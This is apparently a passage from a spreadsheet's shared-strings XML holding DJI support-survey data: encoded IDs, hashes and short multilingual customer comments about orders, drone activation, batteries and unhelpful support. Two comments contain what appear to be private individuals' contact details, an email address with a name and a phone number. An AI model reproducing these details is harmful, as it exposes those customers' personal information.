    <t xml:space="preserve">No answer </t>
  </si>
  <si>
    <t>dKztcqPU3n90JYQ5EI8jB2uJ534mKQF+OjT8FPmt4xU=</t>
  </si>
  <si>
    <t>3dc11e348c8b971ac7a86c208c0491e5</t>
  </si>
  <si>
    <t>|82659955084656711496452</t>
  </si>
  <si>
    <t>hHndZhw7JdbSuNe5J1HvVA==</t>
  </si>
  <si>
    <t>ability to talk to a human</t>
  </si>
  <si>
    <t>djeSx98UFow+zXO6P5nZo1I2CX9jTvSAfUzG0R5+Hn8=</t>
  </si>
  <si>
    <t>59ac5513d9d411809c2a21a43b98f44b</t>
  </si>
  <si>
    <t>|82659652787177096328900</t>
  </si>
  <si>
    <t>s/YmdCLq7hzs82cbNFgVC0Oaj1itzZ1FA68+8pt++Aw=</t>
  </si>
  <si>
    <t>hi
when will my order no. 0310108384061 be shipped?</t>
  </si>
  <si>
    <t>ll3Tvoi3vr0/rcTvCZyWGZBYT9QmGML04vhplp5r+AM=</t>
  </si>
  <si>
    <t>83cada858695ac4de0a86590b050fb3c</t>
  </si>
  <si>
    <t>|82659475653953318678153</t>
  </si>
  <si>
    <t>118Jxkw5sgjXCDF0cgVO/FzX7SXYg+ZBJxQeYLVtjB0=</t>
  </si>
  <si>
    <t>In 30 minutes i will be stopping payment on my air 3s drone , unless i am recieve the shipment as pr</t>
  </si>
  <si>
    <t>OSal/CWpE2qw7PsdLbr/iw==</t>
  </si>
  <si>
    <t>53b3f6050845cb8b9c3f43f0aa31f80a</t>
  </si>
  <si>
    <t>kr_mimo1</t>
  </si>
  <si>
    <t>|82659900512233273824651</t>
  </si>
  <si>
    <t>Kl9v3fV2S1xVOanaalGDZKfJVFafHL1usUyGLBwsjhw=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>사용전</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>활성화가</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>필요하다고</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>했는데</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 5</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>회를</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>전부</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>써버렸을때</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>어떻게</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>해야</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>하나요</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>myLksqq4D+WKpcoLaxInjjdOthxTCiIzeny21cl/aW8=</t>
  </si>
  <si>
    <t>c0886c8f9b43e7cb281b0ab09e3966a4</t>
  </si>
  <si>
    <t>it_store1</t>
  </si>
  <si>
    <t>|82658158422257553253094</t>
  </si>
  <si>
    <t>pixW4RL3/F3oPxd4zTh4WtiEvhMDk+gp1npBbYJmvMY=</t>
  </si>
  <si>
    <t>Dando la possibilità di parlare con un operatore</t>
  </si>
  <si>
    <t>q3THLkOV9bGDQ66FdBeNvAPJ+pVUULq/WOGdeshYwo0=</t>
  </si>
  <si>
    <t>f7b332b14989a0a70c46b73d9ee2ed91</t>
  </si>
  <si>
    <t>|82658143289153581251861</t>
  </si>
  <si>
    <t>5fLbBqq3QvaEW3JYzgjlhw==</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,
Je suis toujours en attente de votre retour concernant ma demande 8697416. </t>
  </si>
  <si>
    <t>6LWZT4uD4FBsBobvolSwE6oaifMOLtXXukAKeDwSvcE=</t>
  </si>
  <si>
    <t>77460acd22c8c5d24af4816d17008cfe</t>
  </si>
  <si>
    <t>|82658137514183500472069</t>
  </si>
  <si>
    <t>7NT+HZX2euORzOQzNH64Jw==</t>
  </si>
  <si>
    <t>I consider that i am asking a viable question about an obvious fault in advertising,  misselling .</t>
  </si>
  <si>
    <t>bCRaz/5PoqAK4P7Stq+2E9Vjt2C37TKgAxaj7G9PhH4=</t>
  </si>
  <si>
    <t>b4e8b13a35b928729c3975de712f77db</t>
  </si>
  <si>
    <t>|82658883028028514843916</t>
  </si>
  <si>
    <t>d/7MOt3w99DD2SBEMt+iEA==</t>
  </si>
  <si>
    <t xml:space="preserve">My order was returned to sender, why ? Order     0010181176712
</t>
  </si>
  <si>
    <t>2BJ6s1k2eJCKnFRYWekKu73lEo53t231jlc/pYmdXFU=</t>
  </si>
  <si>
    <t>0ed839680e35248657ee1b38e5cd046c</t>
  </si>
  <si>
    <t>|82656299950111508653866</t>
  </si>
  <si>
    <t>8YtGtf6PrkGbCoi/2ji7FbbXOvYBfwRXMz/NTDW/Dfs=</t>
  </si>
  <si>
    <t>Poor, I was not able to get the help I needed</t>
  </si>
  <si>
    <t>bkAFHRlCq7koD65bNbNlvuenOtGa/j/EmNjhJXTlesA=</t>
  </si>
  <si>
    <t>7281379be29dadea7900cd3ad743aecc</t>
  </si>
  <si>
    <t>|82656900595907235520449</t>
  </si>
  <si>
    <t>Kb/onysj00ntAdKLnkMyxw==</t>
  </si>
  <si>
    <t xml:space="preserve">I was only referred to the self service options. My order has been stalled in NYC. </t>
  </si>
  <si>
    <t>NqVz8PwwUe3siy1AR4oAAuOW6S2OqL27S8ac9lZ2e1I=</t>
  </si>
  <si>
    <t>c9116019da495a55c93a9ef7b7cbbd91</t>
  </si>
  <si>
    <t>|82656364057344054079135</t>
  </si>
  <si>
    <t>sPY0qqoHK8CH+YaeMavEpQ==</t>
  </si>
  <si>
    <t xml:space="preserve">focus motor on ronin 4d not working
</t>
  </si>
  <si>
    <t>iWvuhQpwE6kgUNGdJcNb40/K2nLDVD1tewCosFJAaKk=</t>
  </si>
  <si>
    <t>91ede6a9255645fe5e4d9e6035e1cf5b</t>
  </si>
  <si>
    <t>|82656076890684835789607</t>
  </si>
  <si>
    <t>MdSEgOtzJIi8peYVJrJyMg==</t>
  </si>
  <si>
    <t xml:space="preserve">I wrote a description of my problem ie I have a Samsung tab S9 is there an old version of dji go 4 </t>
  </si>
  <si>
    <t>Xmj4n96j2ouQM1yfikSNbwloUl/ayDSXlJABvi7GGsI=</t>
  </si>
  <si>
    <t>3df9bb0753e95a39a08c83eea16a2ddb</t>
  </si>
  <si>
    <t>|82656496412701046064863</t>
  </si>
  <si>
    <t>lvd77DvBsgFZYmK9ZGpINdEospESZaa3ILkAF7ueD2o=</t>
  </si>
  <si>
    <t>Hallo ,bei meinem DJI 3 mini pro brent dauerhaft das warenlicht Sichtsensoren wie kan man das behebe</t>
  </si>
  <si>
    <t>NpT7aSqPG4J1h7dED8cjIMMh+2Ryk79p6/Ofgsj19/o=</t>
  </si>
  <si>
    <t>aa785cc881912f21aae6916010ffc6d3</t>
  </si>
  <si>
    <t>de_sp21</t>
  </si>
  <si>
    <t>|82657090163622237766561</t>
  </si>
  <si>
    <t>/yn6ctpTwPp9ULjlLN24qUbgofa9jrrtkVYBQlHX9Cw=</t>
  </si>
  <si>
    <t>Ich bekomme keinen Kontakt mit dem Support</t>
  </si>
  <si>
    <t>bni6MuMuGNdUx7HSBfnkK5xleKD+2RqFM0fDuB8dX68=</t>
  </si>
  <si>
    <t>ff9b1508963d76a7071ef4c1c7126ca3</t>
  </si>
  <si>
    <t>|82656750535706070891162</t>
  </si>
  <si>
    <t>0vCXDCt3UH8sLnPwZpsLn2rdRuCRPSoCl7YJT/l2t4M=</t>
  </si>
  <si>
    <t>Help</t>
  </si>
  <si>
    <t>XKcEorQxmRYnZxbT3wUiFu9M37AaIsPdkYx79Pf7rjk=</t>
  </si>
  <si>
    <t>5dbd51e9ababd6c1e19da8aedfb31fd8</t>
  </si>
  <si>
    <t>|82655517691859008477639</t>
  </si>
  <si>
    <t>1zB4p4E5Ay9dJomD3fugxBdlA2PVv9ZfYVENb2+/FxQ=</t>
  </si>
  <si>
    <t>Someone to answer your question, not AI that sends random useless suggestions</t>
  </si>
  <si>
    <t>Tdvgdq6lbpwoSpJ1yhTX0aSNggaltjNjrK44FP29sOs=</t>
  </si>
  <si>
    <t>4fa40c3e2d0601cadad56046a24d7cec</t>
  </si>
  <si>
    <t>|82655698897227263472395</t>
  </si>
  <si>
    <t>k2cFTJTdCz2An4DNn914Z25I+UJWlMlDuIML+y93WMA=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>카톡으로</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>큐얄코드</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>보네지</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>못했읍니다</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>다시</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>메일</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>보네주시면</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>감사요</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>잘못</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>클릭해서</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>나가기로</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>했네요</t>
    </r>
  </si>
  <si>
    <t>oPgCC3EqVmhELIgalnWNMpaTFzfZFsNLRgV4jA4kzzM=</t>
  </si>
  <si>
    <t>232226d2f40dd0ced1680367e1c15ba2</t>
  </si>
  <si>
    <t>|82656174624692277453086</t>
  </si>
  <si>
    <t>39WhfuDvhXHbzZeBfawp9g==</t>
  </si>
  <si>
    <t>5 days since I contacted support followed up by 2 further contacts, including a phone call. help</t>
  </si>
  <si>
    <t>rtS3uWZlV7meeNjJcrhFMRM5pSD/jD30eBrjhsqa7BU=</t>
  </si>
  <si>
    <t>76a2067141acee80c518713b6fa44979</t>
  </si>
  <si>
    <t>|82653693424912864513965</t>
  </si>
  <si>
    <t>6gWpnWtRE4aOeBDbLBGbeA==</t>
  </si>
  <si>
    <t xml:space="preserve">Did not help </t>
  </si>
  <si>
    <t>JCoF3wSJm9yK84IcluoX+gntwJYInrvI1gLQe2E3THI=</t>
  </si>
  <si>
    <t>57afacc33e02c251feb301757fb4b43a</t>
  </si>
  <si>
    <t>|82653643494431735421251</t>
  </si>
  <si>
    <t>eCh3WDLLbz1sYlzcO4cch5zCJdSoViOO/AjgfJGEUk4=</t>
  </si>
  <si>
    <t>this sucks I need help getting DJI care contact Sam at birchfieldsam@gmail.com thanks</t>
  </si>
  <si>
    <t>A2Mw/+Wm6Oo7jwLSKACQlHcZZjwrmwNWxhL276c1COc=</t>
  </si>
  <si>
    <t>97a98d33ee9832eff01f47dea6ebe151</t>
  </si>
  <si>
    <t>|82652921051964991113309</t>
  </si>
  <si>
    <t>AwOVA0tgCnAiYmrrDZRw5g==</t>
  </si>
  <si>
    <t>specificity</t>
  </si>
  <si>
    <t>gUBnhl3FtuQD9llRALvLMYH6q8J1t5a3yeuuFJVmEL4=</t>
  </si>
  <si>
    <t>c156a02a021b4942bd5e59aca5f9c68f</t>
  </si>
  <si>
    <t>|82653109960329956886742</t>
  </si>
  <si>
    <t>nPDVgXEfaBBIumtulJEdVd7+B2FTeIe6FyJHEpRpJzY=</t>
  </si>
  <si>
    <t>This is all about drones. I'm not trying to repair a drone.</t>
  </si>
  <si>
    <t>Gww8JjeFP1wTYMPHGcrY5BhSGI0/iJ66OxnIIGLMfOU=</t>
  </si>
  <si>
    <t>59d0e4f2b4ee6d77c7778d3dbba9197a</t>
  </si>
  <si>
    <t>|82653390231345541380387</t>
  </si>
  <si>
    <t>t9GKlcSevBbUJy7VOcp4oA==</t>
  </si>
  <si>
    <t>No answer</t>
  </si>
  <si>
    <t>9RuOc95ia8Jz8gVhV17Y3unK8O1vBpmKDM/pyoYpZtg=</t>
  </si>
  <si>
    <t>21b519f4fdbe92734220c8ebc3ea3991</t>
  </si>
  <si>
    <t>|82651887099366559449992</t>
  </si>
  <si>
    <t>TApPofqE8ONOEnHPfWSl+fkIrTD7W04rFvE5FcJ52y4=</t>
  </si>
  <si>
    <t>I am tired of waiting for your customer service reps to answer but they don't hesitate to disconnect</t>
  </si>
  <si>
    <t>vY/yxMrmmOBOyE4ApUE/tUjt9AZGFGOlvggck31eG6U=</t>
  </si>
  <si>
    <t>84ae92ae9369ac64318ab3d5e92c04e9</t>
  </si>
  <si>
    <t>|82652388128224407585821</t>
  </si>
  <si>
    <t>Db5ss4krO42UTOQB8h6K+w==</t>
  </si>
  <si>
    <t>Not available</t>
  </si>
  <si>
    <t>9Z5UiaNQ+deeRfhVJoyao+9pGMEaPhtWpBWrmuA/Xfs=</t>
  </si>
  <si>
    <t>e6608eec4be73a944b773994a2429ac6</t>
  </si>
  <si>
    <t>|82651921684427165734241</t>
  </si>
  <si>
    <t>+GkAyNqRfconFlnNLNCBAjlkZD+WTO4NWtsMShbq9XY=</t>
  </si>
  <si>
    <t>Cant get any help. My new drone is nor working vant activate it!!!!!!</t>
  </si>
  <si>
    <t>tj9ZyzwPLcNScUBp/w0dpMlU5MZpq616Kh059L4ho8A=</t>
  </si>
  <si>
    <t>45b2a466937ba0b08460970f7445ea0a</t>
  </si>
  <si>
    <t>|82651885552281934471745</t>
  </si>
  <si>
    <t>N35hBp6vBW+ml7RcA5sTRw==</t>
  </si>
  <si>
    <t>No one available. When clicking options you are taken away from chat. useless support</t>
  </si>
  <si>
    <t>kLtMHVKmCpgXlZcyqjp/1HIl6aYN+6fiTYBRgeZYV40=</t>
  </si>
  <si>
    <t>a567fdd0bfd5af7df3e4903b30c9f959</t>
  </si>
  <si>
    <t>|82651738759499333495520</t>
  </si>
  <si>
    <t>waMXyL00fmKCaxTwm6vtJGuUPZBpluJ14OTi3wq+W5s=</t>
  </si>
  <si>
    <t xml:space="preserve">What if you get 3 battery's </t>
  </si>
  <si>
    <t>XtZTUPWaGYNEwVhh/LZQiCGOyuZzCMzMOiwrctQLDPo=</t>
  </si>
  <si>
    <t>0db3e7e6c5a1452d1d97085c028bf7c2</t>
  </si>
  <si>
    <t>|82650933201543435598681</t>
  </si>
  <si>
    <t>lsfTm6GjCSEYK6JVXbj0GQ==</t>
  </si>
  <si>
    <t xml:space="preserve">Not getting the information I need
</t>
  </si>
  <si>
    <t>gishWKyKfAmLPYz+5Khm/Ge9t7T6aqZeyMGWzs/pRDY=</t>
  </si>
  <si>
    <t>d2525ea80cc0c87172ad7b8ffa5ec8be</t>
  </si>
  <si>
    <t>|82650250080629035068514</t>
  </si>
  <si>
    <t>FgsxxdbrNcQHUCvhOBhBuw==</t>
  </si>
  <si>
    <t>activation mavic 3T  enterprise</t>
  </si>
  <si>
    <t>amtZR4aAYFoiz2nTarV/IQ==</t>
  </si>
  <si>
    <t>efc48bd598409ba3f9501f23014821b5</t>
  </si>
  <si>
    <t>|82650244053658901755168</t>
  </si>
  <si>
    <t>TbrJ7dIzDvi6J0iDM22ILhyGU1QE7yOb27h9KimMVy4=</t>
  </si>
  <si>
    <t>Either I entered query wrong way..or ? not followed up on.</t>
  </si>
  <si>
    <t>3IkO+cndqPVf8cRR31Bt48Vq74nHh56f04GBL6oJq2I=</t>
  </si>
  <si>
    <t>e04acbfe8c0b0c0634e3305f35495739</t>
  </si>
  <si>
    <t>|82649292484045817832019</t>
  </si>
  <si>
    <t>9TmAys9GfBFpzEjsFBa1yclp0dXX3CHPppi00XLC6ZE=</t>
  </si>
  <si>
    <t xml:space="preserve">I would like for someone to contact me at 832-236-9694 to discuss this issue as soon as possible. </t>
  </si>
  <si>
    <t>n8+uuCAfUamXQz0knc+Twrh5SVr41U4byNLtnCPiwN4=</t>
  </si>
  <si>
    <t>a5b08705109ac27afd0f1cb6c97956ce</t>
  </si>
  <si>
    <t>|82649671768231083715448</t>
  </si>
  <si>
    <t>lPfYAA8ZgsJZAxWFle12Ws/zSN9rzCV5UkJ7/LO3zq8=</t>
  </si>
  <si>
    <t>Has GST been applied why is DJi Australia not handling the item?</t>
  </si>
  <si>
    <t>dCyw0G9YIlDJw2RwM1t2qOBuX+2aojX5kWiex5AnlUM=</t>
  </si>
  <si>
    <t>173c5d7d74b93881050cbccf3351f2a6</t>
  </si>
  <si>
    <t>|82649456210129519762134</t>
  </si>
  <si>
    <t>clebj0bSu71k12YqbugQzw==</t>
  </si>
  <si>
    <t xml:space="preserve">I found out very quickly what I needed to know, with your virtual assistant. </t>
  </si>
  <si>
    <t>JJG/WYeOwhLgrbbHlkkjDg==</t>
  </si>
  <si>
    <t>7eefdf157fabdb945bc5488630a4335c</t>
  </si>
  <si>
    <t>|82648755443695659136752</t>
  </si>
  <si>
    <t>povfK8LkCcOQOvCf0+cFOw==</t>
  </si>
  <si>
    <t xml:space="preserve">habe mir die DJI Mini 3 mit CARE Refresh Keep Flying  über Amason gekauft keine hilfe </t>
  </si>
  <si>
    <t>88Ccx5Ym/3igrRwqESWU4qE8rP5Umh+p5qaPpgfgKt8=</t>
  </si>
  <si>
    <t>27fd45ab2a1d5d28ae6ba57c8e650590</t>
  </si>
  <si>
    <t>|82648542619751521638452</t>
  </si>
  <si>
    <t>w80d3+6f72uKsWuGsX7GOQ==</t>
  </si>
  <si>
    <t xml:space="preserve">I ordered the wrong version.  I wanted to order the air 3S version.  </t>
  </si>
  <si>
    <t>SV43+SfNBk+St2/q6kFNUcqsfH8ZDd2MdroSDCTUKhk=</t>
  </si>
  <si>
    <t>4c7da8e5b3f39e2e49af79836725909e</t>
  </si>
  <si>
    <t>|82647920109828536256427</t>
  </si>
  <si>
    <t>r2sCsyYGmXwIN9YkuET9CcBLzzSPRYHxhXQ1AURj1/0=</t>
  </si>
  <si>
    <t xml:space="preserve">Battery will not take charge </t>
  </si>
  <si>
    <t>GC654wQeTvDbc7irpnXVqy+oSKw0SkYHf2gr/JDxtps=</t>
  </si>
  <si>
    <t>0582514f0e0b3d871a776e8b932ce076</t>
  </si>
  <si>
    <t>|82647574023581629723358</t>
  </si>
  <si>
    <t>33d/H9VjvgbF5mpduFk5wQ==</t>
  </si>
  <si>
    <t xml:space="preserve">Where and when do I send for repairs?
</t>
  </si>
  <si>
    <t>eJEMGkZEmTs9GJzoFCdDf1AD4GcFpdsdHTk59n/1FCg=</t>
  </si>
  <si>
    <t>a969e75e832d27adc339b9a4c81c52e0</t>
  </si>
  <si>
    <t>|82647130422646661354430</t>
  </si>
  <si>
    <t>aZBHiD0KroPv9tU8UsRbbqtW+E/D9x6dA0v2x4pZxX0=</t>
  </si>
  <si>
    <t xml:space="preserve">Not helpful </t>
  </si>
  <si>
    <t>FFcAAaf65sO4o/oqnBcLvs2yHHfWFBN8edYx19I6n8o=</t>
  </si>
  <si>
    <t>c9a88a4e31c078e934b2db59e23ab350</t>
  </si>
  <si>
    <t>au_fly1</t>
  </si>
  <si>
    <t>|82647446615608194790084</t>
  </si>
  <si>
    <t>eRUmv43R9qGGWnG8h9SF4B+19bjcJXd9tP1l4ZZE41Y=</t>
  </si>
  <si>
    <t>Help with camera</t>
  </si>
  <si>
    <t>kPm1SgKIGRcdG8YvhvC0wrt2y5eoRmcqgMKXThaVhf8=</t>
  </si>
  <si>
    <t>2655a78541682453f1529a92d6ad7531</t>
  </si>
  <si>
    <t>|82646961385111609324495</t>
  </si>
  <si>
    <t>0kvEuL7ggUP1i6vi3ILiRwP+Z3Pt8eIV8VYVDc6uAm8=</t>
  </si>
  <si>
    <t>DOES THE DJI 2S WITH THE DJI RC ALLOW YOU TO SET WAYPOINTS?</t>
  </si>
  <si>
    <t>B6pVqI/yLAqAVLngMH0EntrCd6BnUxcnKVlCUzXR6A0=</t>
  </si>
  <si>
    <t>fbcf4f227d1bef5904985fe087b27be2</t>
  </si>
  <si>
    <t>|82646891648028078336044</t>
  </si>
  <si>
    <t>l/YX4obiMblA0BLc6DN20w==</t>
  </si>
  <si>
    <t>I wasnt able to purchase a DJI Care plan</t>
  </si>
  <si>
    <t>XrJm2mjmnltRIBF4Im8bgV74BhkTgaRrvQ6NtLf6cRY=</t>
  </si>
  <si>
    <t>294efca784171691e2927e5426d65832</t>
  </si>
  <si>
    <t>|82646025957445834131899</t>
  </si>
  <si>
    <t>1R2XDDZtde4oB36iuW0nTDNCvnklF3xILp7IKF9sF58=</t>
  </si>
  <si>
    <t>didnt' get the help I needed</t>
  </si>
  <si>
    <t>f0sP341+r3g04FawrG31hhKj/T0CRRjVaZ4HBL+fZQs=</t>
  </si>
  <si>
    <t>79db2a7d87c9af0a8ef4db1be6729e0c</t>
  </si>
  <si>
    <t>|82645154852002548625093</t>
  </si>
  <si>
    <t>FRDA/kbL8/FLSGtvEB9NSQ==</t>
  </si>
  <si>
    <t>when I will received my package , my Order Number:0011650158042</t>
  </si>
  <si>
    <t>pT8x5CiEO/riZ4fEkaBndQVlYpbLRtThru+ItiLKvRM=</t>
  </si>
  <si>
    <t>d1a8bd11400576aee078e86d6521e2c6</t>
  </si>
  <si>
    <t>|82645100013973179871590</t>
  </si>
  <si>
    <t>Yg7ZZYiRY8Z3CiEaAaDFDxWwtmeE5Dr6EiPF3v7xjb8=</t>
  </si>
  <si>
    <t>i can't find activation code, can send my mail that code</t>
  </si>
  <si>
    <t>mxs1fK3w2S0kRCEetlSCD28NaOhKNVfdB8krR7CVYlY=</t>
  </si>
  <si>
    <t>4af909629613641704b3c1bb2be6672d</t>
  </si>
  <si>
    <t>|82644999014558367037001</t>
  </si>
  <si>
    <t>LY2iHtCJB2mJ4GJoKHjX3AoIPlr/8jtgxsArwFe4aS8=</t>
  </si>
  <si>
    <t xml:space="preserve">no resolution </t>
  </si>
  <si>
    <t>6jkfnM1VActH36Vrepia8mDW/fCCXELGGnKmivqgwAo=</t>
  </si>
  <si>
    <t>20f76bd81f034d21adf109d206a344cc</t>
  </si>
  <si>
    <t>na_sp14</t>
  </si>
  <si>
    <t>|82644847062615865030409</t>
  </si>
  <si>
    <t>sW9pfW5czxbJp7OGWp10hw==</t>
  </si>
  <si>
    <t>Answers were quick and efficient</t>
  </si>
  <si>
    <t>xkRPLbDzwkwGIBiK8XSwcJc0vJY7+vbIVlscSC6Li0E=</t>
  </si>
  <si>
    <t>9359aee43b8da4e5b3060905a828aaf8</t>
  </si>
  <si>
    <t>|82643636746662758973215</t>
  </si>
  <si>
    <t>2JQLyIv6aMXD1q8rdIVii6hGzyX1EYPtNq+Xp+vbMo6eyvn1K2vIgUtcO14CJfbr</t>
  </si>
  <si>
    <t xml:space="preserve">I never received my drone </t>
  </si>
  <si>
    <t>yVDIntnL4Zffwr5f2nPpfOWuP4Z+aL+52kBjhSo3i+A=</t>
  </si>
  <si>
    <t>6a2ba8b1fd2bebb20855fcf969d002c2</t>
  </si>
  <si>
    <t>|82643951627871839067972</t>
  </si>
  <si>
    <t>4IzauYaKAN3ht6SozEVtAA==</t>
  </si>
  <si>
    <t xml:space="preserve">Bought new, 2 batteries are not good. How do I get them replaced </t>
  </si>
  <si>
    <t>hQyH9/bZ91NPzZ7pCbqum07obFkyjVyDV1mlFyHgQfc=</t>
  </si>
  <si>
    <t>acf1044bfd0b04f6763e5dedc7df3791</t>
  </si>
  <si>
    <t>|82643393395388631164855</t>
  </si>
  <si>
    <t>LivDKu13WXUdqovCdp2Y3A==</t>
  </si>
  <si>
    <t>My Mavi Pro controller, after being charged turns off almost immmediately. Can u help?</t>
  </si>
  <si>
